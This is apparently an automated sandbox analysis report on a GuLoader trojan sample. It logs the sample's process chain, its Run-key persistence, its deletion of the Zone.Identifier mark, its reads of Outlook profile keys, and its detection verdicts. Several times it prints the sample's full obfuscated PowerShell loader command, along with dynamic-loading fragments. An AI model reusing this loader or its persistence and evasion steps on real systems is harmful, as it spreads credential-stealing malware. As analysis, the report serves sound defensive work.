Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "dir;$Unhappiness = """Pr;PaFreuEkn RcfotKliSeoNun C CoB HaBusReespnAseRhsFusun0Ri4Ma Ba{Tr Pa Ep Un UpUnaCyrStalimCa(An[DaSPitLnrBliInnRegTr]Es`$PaTraa RcWyhRtyTrgGreUnnAle GsSkiDrs B)Su;Dr Aa Sp un Gr`$ CPNeaGetAnrKuiEllDoaJutbaeMerDiaqul B Br=Cl GeN SeBawBe- BO CbStjCaecacBlteu Beb myUntKieEk[ud] M Ep(Ta`$SoT Pa KcSuhInySugJeeBonOne PsDiiDisSi.UnLRae Ln TgTitBohEj S/Ge Sk2Ca)Ha;Be Po Sk Fr OpFAvoHerUb( U`$ PJUdiKamPrcIsrLaaUic Dk V= B0Ls; E Co`$ExJPoi hmExcSrrIna IcSik W In-TalhatSu Un`$ ST FaExcLeh SyOpgReeSan ReFosUniCrs K.RoLAneUtnFigEmtGrhDi;Od Un`$uhJLiiSpmOvcSnrTsaUlc skDe+Sk=De2tr)Sp{Pe Me Fo`$GlEDakSas HkAnoHanTegJoe ArShnFoehasSk Bl= K Pr`$GaTDeaHycTihFlyPagJueTinSueTjsThi SsTi.OpS FuCobmesDotEcrSiiVanFrgDe( S`$ FJPaiAkmElcHorLiaBocBokSp,Hi Sk2Do)Pa;Ge St be Fe Go De su Tr Pa`$RuPGra TtZyrLaiSalGrafotshegrrChaopl e[Ne`$PaJPriNem CcPrrInaRgcTykCl/Fo2Un] S In=Sy F[BacReoStn GvKaePorRetVi]In:Co:PaTtooflB MySitKyeGa(Ti`$ViE UkHis HkDioTon Mgsye GrannCieupsSe,Vi Wh1Ra6Se) U; R Ar G`$FaPFoaSqtPrr aiMalDea Pt LeSnrOzaSul V[Do`$ FJboiRommycApr SaUncSekKd/Mo2 s] u r=Ta ScQbyuAleDirTacFli UmWheNerBliTvtPurMoiPen M8Pa Co`$ SPFlaCotFirIniTylToa KtoceAnrUraanlFu[ S`$FoJ PiAmmGlcKrrLaaFocKakSa/Fo2Un]Sy L1 O8 T2Op;Sk Vu Xa Ve o}In Ug[TrSOmtFer RiUdn ggDo] P[snSPayQusEetPue LmDe. UTUneCox HtFl. NETrnAfcSuoUvdUniDinMeg R] G:Fo:BaAKoS SCAlI AIse.KrG SeDotMiSTrtVirNiifinFrgTe(St`$KaPTiaIntNorGaiKel RaVrt se Nr OaAklMu)Ud;Se}Fr`$RoUDirGibMua CnGuespl Sy E1Da7 P2 B0an=MiB HaScsTheDinPaeGgsPhsCl0Li4Ta Ti' TEBa5FlCPoF ECUd5liCSe2ReDHu3TaD PBNy9Yn8FaDre2SeD IAhyDPoA u'Bo; S`$flUAprSib BaArnIseBul SyCa1 A7No2la1 r=UdB FaAns eePln HeResInsLo0 V4 N Aa' HF PBSuD VF LDLa5 UCAn4ReDPa9SkCRe5SpD T9DiD R0DeCTr2Un9 S8AfEDe1EdDCoFPaDBu8Un8Se5 T8Un4Be9Up8 AEEn3WiDha8MoC v5krDEp7DaDFo0CoDAr3EuF D8MaDtl7FoCHo2orDArF MC B0ChDXe3OsFNoBFrDIc3 BCCo2DeD pETrDOv9UnDTy2 BCun5Ki' B;Ge`$HoU KrdibPoaDynImeKolCly T1 S7St2 S2Kn=BlB saLos DeornMoe Rs Fs I0 G4Qu an'AlF E1WaDPa3BlCMo2 FE A6MuCKd4KoDUl9 GDDo5GrFCi7UnD R2BiDBa2LiC D4CoDGu3AnCPl5SuC S5La'De;Ca`$ EUDirsebPra tnPle RlStyUd1Ce7Ni2Ar3Ap=UnBBaaUmsuneKonDvePusBusVi0Au4Be Sm'CoESa5QuCTaFSnCGi5AfCMo2NyDEf3RaD MBSu9 B8 DETr4NoC N3MeDSe8FoCRe2BeDFoFKaDTeBDuD D3 S9Sk8EpFShFYdD A8AeCMu2 FDho3MaCPa4UdDIn9UfC m6HeEKo5 BDSu3PaC c4AcCLi0AlDPoFdiD S5 VDSt3HaCSk5Dd9li8PoFKaEEmDAn7SkD F8FeDTo2 RDTaAMiDLk3MuEHj4BeDPo3 AD T0ti' D;Go`$KuUSiranbApaKanTheFelroy a1Ob7Ri2Az4Di=TuB naKlsNaeKanOpeWis Osst0Un4 B Wi'LiCty5 DCJu2DeCNo4HaDUdF TDEb8QuD B1Sa' U;Ko`$CeUSarGrbTraBanMaeDrlReyin1 T7Am2Pl5 A=FoBDoaAnsPaeRynLaeFosSusEr0 T4Sp Sl'FaFSe1AvD T3StCSk2 FFVaB SD B9FyDCr2ovCWo3UnDBiASuDte3 AFHeE PDTv7IkDCe8diDVi2EnD SApoDAf3 U'Wa; G`$ TUOprRebTaa KnGre DlDeyWa1Di7Op2Fe6Ek=CoB NaLisNoeConAkeJusFosOe0 B4Je Kl'SkESi4NiEAe2ReEVi5OvC E6ThDFo3SpDUf5BeDBlFSaDbl7EtDOcAEnFFr8taD C7KeDCaB LDBa3 I9CuASu9Sm6 SFBoEKoD KFHoDSp2VoD R3ReF S4 AC VF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe "C:\Users\user\AppData\Roaming\Myapp\Myapp.exe"
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe "C:\Users\user\AppData\Roaming\Myapp\Myapp.exe"
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell -windowstyle minimized $malder = Get-Content 'C:\Users\user~1\AppData\Local\Temp\epicentrummers\Eleve\Naturfredningsforeningerne6\Cykels235.Sil' ; Powershell.ExE "$malder"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "dir;$Unhappiness = """Pr;PaFreuEkn RcfotKliSeoNun C CoB HaBusReespnAseRhsFusun0Ri4Ma Ba{Tr Pa Ep Un UpUnaCyrStalimCa(An[DaSPitLnrBliInnRegTr]Es`$PaTraa RcWyhRtyTrgGreUnnAle GsSkiDrs B)Su;Dr Aa Sp un Gr`$ CPNeaGetAnrKuiEllDoaJutbaeMerDiaqul B Br=Cl GeN SeBawBe- BO CbStjCaecacBlteu Beb myUntKieEk[ud] M Ep(Ta`$SoT Pa KcSuhInySugJeeBonOne PsDiiDisSi.UnLRae Ln TgTitBohEj S/Ge Sk2Ca)Ha;Be Po Sk Fr OpFAvoHerUb( U`$ PJUdiKamPrcIsrLaaUic Dk V= B0Ls; E Co`$ExJPoi hmExcSrrIna IcSik W In-TalhatSu Un`$ ST FaExcLeh SyOpgReeSan ReFosUniCrs K.RoLAneUtnFigEmtGrhDi;Od Un`$uhJLiiSpmOvcSnrTsaUlc skDe+Sk=De2tr)Sp{Pe Me Fo`$GlEDakSas HkAnoHanTegJoe ArShnFoehasSk Bl= K Pr`$GaTDeaHycTihFlyPagJueTinSueTjsThi SsTi.OpS FuCobmesDotEcrSiiVanFrgDe( S`$ FJPaiAkmElcHorLiaBocBokSp,Hi Sk2Do)Pa;Ge St be Fe Go De su Tr Pa`$RuPGra TtZyrLaiSalGrafotshegrrChaopl e[Ne`$PaJPriNem CcPrrInaRgcTykCl/Fo2Un] S In=Sy F[BacReoStn GvKaePorRetVi]In:Co:PaTtooflB MySitKyeGa(Ti`$ViE UkHis HkDioTon Mgsye GrannCieupsSe,Vi Wh1Ra6Se) U; R Ar G`$FaPFoaSqtPrr aiMalDea Pt LeSnrOzaSul V[Do`$ FJboiRommycApr SaUncSekKd/Mo2 s] u r=Ta ScQbyuAleDirTacFli UmWheNerBliTvtPurMoiPen M8Pa Co`$ SPFlaCotFirIniTylToa KtoceAnrUraanlFu[ S`$FoJ PiAmmGlcKrrLaaFocKakSa/Fo2Un]Sy L1 O8 T2Op;Sk Vu Xa Ve o}In Ug[TrSOmtFer RiUdn ggDo] P[snSPayQusEetPue LmDe. UTUneCox HtFl. NETrnAfcSuoUvdUniDinMeg R] G:Fo:BaAKoS SCAlI AIse.KrG SeDotMiSTrtVirNiifinFrgTe(St`$KaPTiaIntNorGaiKel RaVrt se Nr OaAklMu)Ud;Se}Fr`$RoUDirGibMua CnGuespl Sy E1Da7 P2 B0an=MiB HaScsTheDinPaeGgsPhsCl0Li4Ta Ti' TEBa5FlCPoF ECUd5liCSe2ReDHu3TaD PBNy9Yn8FaDre2SeD IAhyDPoA u'Bo; S`$flUAprSib BaArnIseBul SyCa1 A7No2la1 r=UdB FaAns eePln HeResInsLo0 V4 N Aa' HF PBSuD VF LDLa5 UCAn4ReDPa9SkCRe5SpD T9DiD R0DeCTr2Un9 S8AfEDe1EdDCoFPaDBu8Un8Se5 T8Un4Be9Up8 AEEn3WiDha8MoC v5krDEp7DaDFo0CoDAr3EuF D8MaDtl7FoCHo2orDArF MC B0ChDXe3OsFNoBFrDIc3 BCCo2DeD pETrDOv9UnDTy2 BCun5Ki' B;Ge`$HoU KrdibPoaDynImeKolCly T1 S7St2 S2Kn=BlB saLos DeornMoe Rs Fs I0 G4Qu an'AlF E1WaDPa3BlCMo2 FE A6MuCKd4KoDUl9 GDDo5GrFCi7UnD R2BiDBa2LiC D4CoDGu3AnCPl5SuC S5La'De;Ca`$ EUDirsebPra tnPle RlStyUd1Ce7Ni2Ar3Ap=UnBBaaUmsuneKonDvePusBusVi0Au4Be Sm'CoESa5QuCTaFSnCGi5AfCMo2NyDEf3RaD MBSu9 B8 DETr4NoC N3MeDSe8FoCRe2BeDFoFKaDTeBDuD D3 S9Sk8EpFShFYdD A8AeCMu2 FDho3MaCPa4UdDIn9UfC m6HeEKo5 BDSu3PaC c4AcCLi0AlDPoFdiD S5 VDSt3HaCSk5Dd9li8PoFKaEEmDAn7SkD F8FeDTo2 RDTaAMiDLk3MuEHj4BeDPo3 AD T0ti' D;Go`$KuUSiranbApaKanTheFelroy a1Ob7Ri2Az4Di=TuB naKlsNaeKanOpeWis Osst0Un4 B Wi'LiCty5 DCJu2DeCNo4HaDUdF TDEb8QuD B1Sa' U;Ko`$CeUSarGrbTraBanMaeDrlReyin1 T7Am2Pl5 A=FoBDoaAnsPaeRynLaeFosSusEr0 T4Sp Sl'FaFSe1AvD T3StCSk2 FFVaB SD B9FyDCr2ovCWo3UnDBiASuDte3 AFHeE PDTv7IkDCe8diDVi2EnD SApoDAf3 U'Wa; G`$ TUOprRebTaa KnGre DlDeyWa1Di7Op2Fe6Ek=CoB NaLisNoeConAkeJusFosOe0 B4Je Kl'SkESi4NiEAe2ReEVi5OvC E6ThDFo3SpDUf5BeDBlFSaDbl7EtDOcAEnFFr8taD C7KeDCaB LDBa3 I9CuASu9Sm6 SFBoEKoD KFHoDSp2VoD R3ReF S4 AC VF	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

0_2_00403348

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsl1793.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@12/14@3/4

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe

Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040460D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: demand_rpkb_060923.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000003.00000002.447870712.000000000B40F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "dir;$Unhappiness = """Pr;PaFreuEkn RcfotKliSeoNun C CoB HaBusReespnAseRhsFusun0Ri4Ma Ba{Tr Pa Ep Un UpUnaCyrStalimCa(An[DaSPitLnrBliInnRegTr]Es`$PaTraa RcWyhRtyTrgGreUnnAle GsSkiDrs B)Su;Dr Aa Sp un Gr`$ CPNeaGetAnrKuiEllDoaJutbaeMerDiaqul B Br=Cl GeN SeBawBe- BO CbStjCaecacBlteu Beb myUntKieEk[ud] M Ep(Ta`$SoT Pa KcSuhInySugJeeBonOne PsDiiDisSi.UnLRae Ln TgTitBohEj S/Ge Sk2Ca)Ha;Be Po Sk Fr OpFAvoHerUb( U`$ PJUdiKamPrcIsrLaaUic Dk V= B0Ls; E Co`$ExJPoi hmExcSrrIna IcSik W In-TalhatSu Un`$ ST FaExcLeh SyOpgReeSan ReFosUniCrs K.RoLAneUtnFigEmtGrhDi;Od Un`$uhJLiiSpmOvcSnrTsaUlc skDe+Sk=De2tr)Sp{Pe Me Fo`$GlEDakSas HkAnoHanTegJoe ArShnFoehasSk Bl= K Pr`$GaTDeaHycTihFlyPagJueTinSueTjsThi SsTi.OpS FuCobmesDotEcrSiiVanFrgDe( S`$ FJPaiAkmElcHorLiaBocBokSp,Hi Sk2Do)Pa;Ge St be Fe Go De su Tr Pa`$RuPGra TtZyrLaiSalGrafotshegrrChaopl e[Ne`$PaJPriNem CcPrrInaRgcTykCl/Fo2Un] S In=Sy F[BacReoStn GvKaePorRetVi]In:Co:PaTtooflB MySitKyeGa(Ti`$ViE UkHis HkDioTon Mgsye GrannCieupsSe,Vi Wh1Ra6Se) U; R Ar G`$FaPFoaSqtPrr aiMalDea Pt LeSnrOzaSul V[Do`$ FJboiRommycApr SaUncSekKd/Mo2 s] u r=Ta ScQbyuAleDirTacFli UmWheNerBliTvtPurMoiPen M8Pa Co`$ SPFlaCotFirIniTylToa KtoceAnrUraanlFu[ S`$FoJ PiAmmGlcKrrLaaFocKakSa/Fo2Un]Sy L1 O8 T2Op;Sk Vu Xa Ve o}In Ug[TrSOmtFer RiUdn ggDo] P[snSPayQusEetPue LmDe. UTUneCox HtFl. NETrnAfcSuoUvdUniDinMeg R] G:Fo:BaAKoS SCAlI AIse.KrG SeDotMiSTrtVirNiifinFrgTe(St`$KaPTiaIntNorGaiKel RaVrt se Nr OaAklMu)Ud;Se}Fr`$RoUDirGibMua CnGuespl Sy E1Da7 P2 B0an=MiB HaScsTheDinPaeGgsPhsCl0Li4Ta Ti' TEBa5FlCPoF ECUd5liCSe2ReDHu3TaD PBNy9Yn8FaDre2SeD IAhyDPoA u'Bo; S`$flUAprSib BaArnIseBul SyCa1 A7No2la1 r=UdB FaAns eePln HeResInsLo0 V4 N Aa' HF PBSuD VF LDLa5 UCAn4ReDPa9SkCRe5SpD T9DiD R0DeCTr2Un9 S8AfEDe1EdDCoFPaDBu8Un8Se5 T8Un4Be9Up8 AEEn3WiDha8MoC v5krDEp7DaDFo0CoDAr3EuF D8MaDtl7FoCHo2orDArF MC B0ChDXe3OsFNoBFrDIc3 BCCo2DeD pETrDOv9UnDTy2 BCun5Ki' B;Ge`$HoU KrdibPoaDynImeKolCly T1 S7St2 S2Kn=BlB saLos DeornMoe Rs Fs I0 G4Qu an'AlF E1WaDPa3BlCMo2 FE A6MuCKd4KoDUl9 GDDo5GrFCi7UnD R2BiDBa2LiC D4CoDGu3AnCPl5SuC S5La'De;Ca`$ EUDirsebPra tnPle RlStyUd1Ce7Ni2Ar3Ap=UnBBaaUmsuneKonDvePusBusVi0Au4Be Sm'CoESa5QuCTaFSnCGi5AfCMo2NyDEf3RaD MBSu9 B8 DETr4NoC N3MeDSe8FoCRe2BeDFoFKaDTeBDuD D3 S9Sk8EpFShFYdD A8AeCMu2 FDho3MaCPa4UdDIn9UfC m6HeEKo5 BDSu3PaC c4AcCLi0AlDPoFdiD S5 VDSt3HaCSk5Dd9li8PoFKaEEmDAn7SkD F8FeDTo2 RDTaAMiDLk3MuEHj4BeDPo3 AD T0ti' D;Go`$KuUSiranbApaKanTheFelroy a1Ob7Ri2Az4Di=TuB naKlsNaeKanOpeWis Osst0Un4 B Wi'LiCty5 DCJu2DeCNo4HaDUdF TDEb8QuD B1Sa' U;Ko`$CeUSarGrbTraBanMaeDrlReyin1 T7Am2Pl5 A=FoBDoaAnsPaeRynLaeFosSusEr0 T4Sp Sl'FaFSe1AvD T3StCSk2 FFVaB SD B9FyDCr2ovCWo3UnDBiASuDte3 AFHeE PDTv7IkDCe8diDVi2EnD SApoDAf3 U'Wa; G`$ TUOprRebTaa KnGre DlDeyWa1Di7Op2Fe6Ek=CoB NaLisNoeConAkeJusFosOe0 B4Je Kl'SkESi4NiEAe2ReEVi5OvC E6ThDFo3SpDUf5BeDBlFSaDbl7EtDOcAEnFFr8taD C7KeDCaB LDBa3 I9CuASu9Sm6 SFBoEKoD KFHoDSp2VoD R3ReF S4 AC VF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "dir;$Unhappiness = """Pr;PaFreuEkn RcfotKliSeoNun C CoB HaBusReespnAseRhsFusun0Ri4Ma Ba{Tr Pa Ep Un UpUnaCyrStalimCa(An[DaSPitLnrBliInnRegTr]Es`$PaTraa RcWyhRtyTrgGreUnnAle GsSkiDrs B)Su;Dr Aa Sp un Gr`$ CPNeaGetAnrKuiEllDoaJutbaeMerDiaqul B Br=Cl GeN SeBawBe- BO CbStjCaecacBlteu Beb myUntKieEk[ud] M Ep(Ta`$SoT Pa KcSuhInySugJeeBonOne PsDiiDisSi.UnLRae Ln TgTitBohEj S/Ge Sk2Ca)Ha;Be Po Sk Fr OpFAvoHerUb( U`$ PJUdiKamPrcIsrLaaUic Dk V= B0Ls; E Co`$ExJPoi hmExcSrrIna IcSik W In-TalhatSu Un`$ ST FaExcLeh SyOpgReeSan ReFosUniCrs K.RoLAneUtnFigEmtGrhDi;Od Un`$uhJLiiSpmOvcSnrTsaUlc skDe+Sk=De2tr)Sp{Pe Me Fo`$GlEDakSas HkAnoHanTegJoe ArShnFoehasSk Bl= K Pr`$GaTDeaHycTihFlyPagJueTinSueTjsThi SsTi.OpS FuCobmesDotEcrSiiVanFrgDe( S`$ FJPaiAkmElcHorLiaBocBokSp,Hi Sk2Do)Pa;Ge St be Fe Go De su Tr Pa`$RuPGra TtZyrLaiSalGrafotshegrrChaopl e[Ne`$PaJPriNem CcPrrInaRgcTykCl/Fo2Un] S In=Sy F[BacReoStn GvKaePorRetVi]In:Co:PaTtooflB MySitKyeGa(Ti`$ViE UkHis HkDioTon Mgsye GrannCieupsSe,Vi Wh1Ra6Se) U; R Ar G`$FaPFoaSqtPrr aiMalDea Pt LeSnrOzaSul V[Do`$ FJboiRommycApr SaUncSekKd/Mo2 s] u r=Ta ScQbyuAleDirTacFli UmWheNerBliTvtPurMoiPen M8Pa Co`$ SPFlaCotFirIniTylToa KtoceAnrUraanlFu[ S`$FoJ PiAmmGlcKrrLaaFocKakSa/Fo2Un]Sy L1 O8 T2Op;Sk Vu Xa Ve o}In Ug[TrSOmtFer RiUdn ggDo] P[snSPayQusEetPue LmDe. UTUneCox HtFl. NETrnAfcSuoUvdUniDinMeg R] G:Fo:BaAKoS SCAlI AIse.KrG SeDotMiSTrtVirNiifinFrgTe(St`$KaPTiaIntNorGaiKel RaVrt se Nr OaAklMu)Ud;Se}Fr`$RoUDirGibMua CnGuespl Sy E1Da7 P2 B0an=MiB HaScsTheDinPaeGgsPhsCl0Li4Ta Ti' TEBa5FlCPoF ECUd5liCSe2ReDHu3TaD PBNy9Yn8FaDre2SeD IAhyDPoA u'Bo; S`$flUAprSib BaArnIseBul SyCa1 A7No2la1 r=UdB FaAns eePln HeResInsLo0 V4 N Aa' HF PBSuD VF LDLa5 UCAn4ReDPa9SkCRe5SpD T9DiD R0DeCTr2Un9 S8AfEDe1EdDCoFPaDBu8Un8Se5 T8Un4Be9Up8 AEEn3WiDha8MoC v5krDEp7DaDFo0CoDAr3EuF D8MaDtl7FoCHo2orDArF MC B0ChDXe3OsFNoBFrDIc3 BCCo2DeD pETrDOv9UnDTy2 BCun5Ki' B;Ge`$HoU KrdibPoaDynImeKolCly T1 S7St2 S2Kn=BlB saLos DeornMoe Rs Fs I0 G4Qu an'AlF E1WaDPa3BlCMo2 FE A6MuCKd4KoDUl9 GDDo5GrFCi7UnD R2BiDBa2LiC D4CoDGu3AnCPl5SuC S5La'De;Ca`$ EUDirsebPra tnPle RlStyUd1Ce7Ni2Ar3Ap=UnBBaaUmsuneKonDvePusBusVi0Au4Be Sm'CoESa5QuCTaFSnCGi5AfCMo2NyDEf3RaD MBSu9 B8 DETr4NoC N3MeDSe8FoCRe2BeDFoFKaDTeBDuD D3 S9Sk8EpFShFYdD A8AeCMu2 FDho3MaCPa4UdDIn9UfC m6HeEKo5 BDSu3PaC c4AcCLi0AlDPoFdiD S5 VDSt3HaCSk5Dd9li8PoFKaEEmDAn7SkD F8FeDTo2 RDTaAMiDLk3MuEHj4BeDPo3 AD T0ti' D;Go`$KuUSiranbApaKanTheFelroy a1Ob7Ri2Az4Di=TuB naKlsNaeKanOpeWis Osst0Un4 B Wi'LiCty5 DCJu2DeCNo4HaDUdF TDEb8QuD B1Sa' U;Ko`$CeUSarGrbTraBanMaeDrlReyin1 T7Am2Pl5 A=FoBDoaAnsPaeRynLaeFosSusEr0 T4Sp Sl'FaFSe1AvD T3StCSk2 FFVaB SD B9FyDCr2ovCWo3UnDBiASuDte3 AFHeE PDTv7IkDCe8diDVi2EnD SApoDAf3 U'Wa; G`$ TUOprRebTaa KnGre DlDeyWa1Di7Op2Fe6Ek=CoB NaLisNoeConAkeJusFosOe0 B4Je Kl'SkESi4NiEAe2ReEVi5OvC E6ThDFo3SpDUf5BeDBlFSaDbl7EtDOcAEnFFr8taD C7KeDCaB LDBa3 I9CuASu9Sm6 SFBoEKoD KFHoDSp2VoD R3ReF S4 AC VF			Jump to behavior

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((fkp $Cottrell $Gudes4), (GDT @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$allerunderdanigsteltared = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Urbanely1728)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Urbanely1729, $false).DefineType($Gudes0, $G

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File created: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Myapp			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Myapp			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Users\user\AppData\Roaming\Myapp\Myapp.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\demand_rpkb_060923.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
